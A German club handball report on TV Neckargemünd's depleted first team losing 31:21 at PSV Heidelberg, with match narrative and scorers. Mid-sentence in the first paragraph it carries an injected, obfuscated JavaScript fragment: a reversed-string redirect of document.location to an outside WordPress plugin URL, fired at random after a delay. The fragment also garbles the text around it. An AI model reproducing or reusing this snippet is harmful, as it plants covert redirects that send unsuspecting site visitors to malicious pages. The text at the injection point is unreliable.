Herren 1: geschwächt beim PSV verloren

Am Sonntagabend, dem 23.11., musste eine geschwächte erste Mannschaft des TV Neckargemünd beim PSV Heidelberg antreten. Nachdem sich die zwei Außenspieler im Mittagsspiel verletzten und ein weiterer Rückraum wegen Verletzung vom letzten Wochenende ausfiel, ging es am Sonntag zur Tatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tortzeit darum, eine vernünftige Aufstellung zu basteln und dem Gegner seinen ersten Punktgewinn schwer zu machen. Endstand: PSV Heidelberg – TV Neckargemünd 31:21
Neckargemünd, 25.11.14 (ast) – Der PSV spielte mit Verstärkung aus der Landesligajugend schnell auf und Neckargemünd setzte auf Ruhe und Sicherheit, um nicht durch leichte Konter zurückzufallen. Bis zum 9:8 gelang das auch mit einem gut durchdachten zweiten Kreisläufer. Nachdem sich aber der nächste Neckargemünder mit einer Verletzung unter dem Auge aus dem Spielgeschehen verabschiedete und die Bank so auf einen letzten Auswechselspieler schrumpfte, war die Kondition der zweite Gegner auf dem Platz.
Der Spielfluss im Angriff wurde zu leicht gestört und plötzlich konnte der PSV die befürchteten Konter laufen und obschon der neckargemünder Torwart glänzend parierte, konnten die PSVler auf 14:8 zur Halbzeit davonziehen.

2. Halbzeit
Mit kurzen Worten: der neckargemünder Abschlusserfolg schwand. Die Kontermöglichkeiten häuften sich und auch die Abwehr brach ein.
Der TSV kam nicht länger an die wachsende Führung der Gegner heran und unterlag am Ende 31:21.
Einen herzlichen Dank an den neuen Rückraumspieler und die Hilfe aus der zweiten Mannschaft, ohne die der TSV in Unterzahl aufgelaufen wäre.

Es spielten:
Im Feld: Johannes Hünnerkopf (3), P. Zervondonis (1), Michael Lichtl (1), Alexander Stephan (1), Jan Thieme (3), NilsBerner (1), TomislavUremovic (9), U.richWeitzel (3).
Im Tor: Michael Estl.